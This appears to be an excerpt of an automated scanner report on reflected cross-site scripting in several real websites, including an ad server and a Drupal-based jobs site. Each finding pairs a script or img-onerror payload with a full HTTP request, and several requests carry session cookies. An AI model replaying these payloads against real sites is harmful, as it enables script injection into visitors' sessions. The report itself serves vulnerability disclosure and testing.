The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15372"><script>alert(1)</script>519552992e4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205/178596015372"><script>alert(1)</script>519552992e4/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 371
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4983"><script>alert(1)</script>a5233a774cb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205/1785960/0a4983"><script>alert(1)</script>a5233a774cb/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 371
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56715"><script>alert(1)</script>1b3cc5afd7e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205/1785960/0/22556715"><script>alert(1)</script>1b3cc5afd7e/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 371
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2215b"><script>alert(1)</script>9c7a1b47bba was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205/1785960/0/225/ADTECH2215b"><script>alert(1)</script>9c7a1b47bba;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 371
3.20. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ads.intergi.com
Path:
/adiframe/3.0/5205/1785960/0/225/ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec250"><script>alert(1)</script>e520c05f978 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group]&ec250"><script>alert(1)</script>e520c05f978=1 HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 374
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload b937a><script>alert(1)</script>900b161fd17 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205/1785960/0/225/ADTECH;target=b937a><script>alert(1)</script>900b161fd17 HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 270
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24df1"><script>alert(1)</script>1376414e666 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group]24df1"><script>alert(1)</script>1376414e666 HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 371
3.23. http://i2.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://i2.services.social.microsoft.com
Path:
/search/Widgets/SearchBox.jss
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6945e<img%20src%3da%20onerror%3dalert(1)>d02588c1036 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6945e<img src=a onerror=alert(1)>d02588c1036 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d636"><img%20src%3da%20onerror%3dalert(1)>cd559f46f5d was submitted in the REST URL parameter 1. This input was echoed as 4d636"><img src=a onerror=alert(1)>cd559f46f5d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2936"><img%20src%3da%20onerror%3dalert(1)>c561c14c380 was submitted in the REST URL parameter 1. This input was echoed as a2936"><img src=a onerror=alert(1)>c561c14c380 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /jobsa2936"><img%20src%3da%20onerror%3dalert(1)>c561c14c380/ HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6db47"><img%20src%3da%20onerror%3dalert(1)>44ae54b8308 was submitted in the REST URL parameter 1. This input was echoed as 6db47"><img src=a onerror=alert(1)>44ae54b8308 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /misc6db47"><img%20src%3da%20onerror%3dalert(1)>44ae54b8308/drupal.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4212b"><img%20src%3da%20onerror%3dalert(1)>a9b9e94b7d6 was submitted in the REST URL parameter 2. This input was echoed as 4212b"><img src=a onerror=alert(1)>a9b9e94b7d6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /misc/drupal.js4212b"><img%20src%3da%20onerror%3dalert(1)>a9b9e94b7d6?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40742"><img%20src%3da%20onerror%3dalert(1)>31ba6936dc0 was submitted in the REST URL parameter 1. This input was echoed as 40742"><img src=a onerror=alert(1)>31ba6936dc0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /misc40742"><img%20src%3da%20onerror%3dalert(1)>31ba6936dc0/jquery.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f59a7"><img%20src%3da%20onerror%3dalert(1)>a304b595f21 was submitted in the REST URL parameter 2. This input was echoed as f59a7"><img src=a onerror=alert(1)>a304b595f21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /misc/jquery.jsf59a7"><img%20src%3da%20onerror%3dalert(1)>a304b595f21?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2215b"><img%20src%3da%20onerror%3dalert(1)>082ddcb195 was submitted in the REST URL parameter 1. This input was echoed as 2215b"><img src=a onerror=alert(1)>082ddcb195 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules2215b"><img%20src%3da%20onerror%3dalert(1)>082ddcb195/node/node.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6084"><img%20src%3da%20onerror%3dalert(1)>79d8aaa6a1b was submitted in the REST URL parameter 2. This input was echoed as c6084"><img src=a onerror=alert(1)>79d8aaa6a1b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/nodec6084"><img%20src%3da%20onerror%3dalert(1)>79d8aaa6a1b/node.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36cfd"><img%20src%3da%20onerror%3dalert(1)>0112b661d83 was submitted in the REST URL parameter 3. This input was echoed as 36cfd"><img src=a onerror=alert(1)>0112b661d83 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/node/node.css36cfd"><img%20src%3da%20onerror%3dalert(1)>0112b661d83?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2480"><img%20src%3da%20onerror%3dalert(1)>6e90a398a07 was submitted in the REST URL parameter 1. This input was echoed as c2480"><img src=a onerror=alert(1)>6e90a398a07 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modulesc2480"><img%20src%3da%20onerror%3dalert(1)>6e90a398a07/system/defaults.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b1b0"><img%20src%3da%20onerror%3dalert(1)>5dcfcce2e62 was submitted in the REST URL parameter 2. This input was echoed as 6b1b0"><img src=a onerror=alert(1)>5dcfcce2e62 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/system6b1b0"><img%20src%3da%20onerror%3dalert(1)>5dcfcce2e62/defaults.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb2fe"><img%20src%3da%20onerror%3dalert(1)>e5a5118278f was submitted in the REST URL parameter 3. This input was echoed as bb2fe"><img src=a onerror=alert(1)>e5a5118278f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/system/defaults.cssbb2fe"><img%20src%3da%20onerror%3dalert(1)>e5a5118278f?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload beda8"><img%20src%3da%20onerror%3dalert(1)>6e4c1ce2860 was submitted in the REST URL parameter 1. This input was echoed as beda8"><img src=a onerror=alert(1)>6e4c1ce2860 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modulesbeda8"><img%20src%3da%20onerror%3dalert(1)>6e4c1ce2860/system/system-menus.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93062"><img%20src%3da%20onerror%3dalert(1)>1f99fd27bf was submitted in the REST URL parameter 2. This input was echoed as 93062"><img src=a onerror=alert(1)>1f99fd27bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/system93062"><img%20src%3da%20onerror%3dalert(1)>1f99fd27bf/system-menus.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91038"><img%20src%3da%20onerror%3dalert(1)>24b23078d8b was submitted in the REST URL parameter 3. This input was echoed as 91038"><img src=a onerror=alert(1)>24b23078d8b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/system/system-menus.css91038"><img%20src%3da%20onerror%3dalert(1)>24b23078d8b?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a02d"><img%20src%3da%20onerror%3dalert(1)>ae1a910df3b was submitted in the REST URL parameter 1. This input was echoed as 1a02d"><img src=a onerror=alert(1)>ae1a910df3b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules1a02d"><img%20src%3da%20onerror%3dalert(1)>ae1a910df3b/system/system.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41960"><img%20src%3da%20onerror%3dalert(1)>bb9a86cebe9 was submitted in the REST URL parameter 2. This input was echoed as 41960"><img src=a onerror=alert(1)>bb9a86cebe9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/system41960"><img%20src%3da%20onerror%3dalert(1)>bb9a86cebe9/system.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae674"><img%20src%3da%20onerror%3dalert(1)>1a80ccbe22f was submitted in the REST URL parameter 3. This input was echoed as ae674"><img src=a onerror=alert(1)>1a80ccbe22f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/system/system.cssae674"><img%20src%3da%20onerror%3dalert(1)>1a80ccbe22f?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f56d7"><img%20src%3da%20onerror%3dalert(1)>18564c695ef was submitted in the REST URL parameter 1. This input was echoed as f56d7"><img src=a onerror=alert(1)>18564c695ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
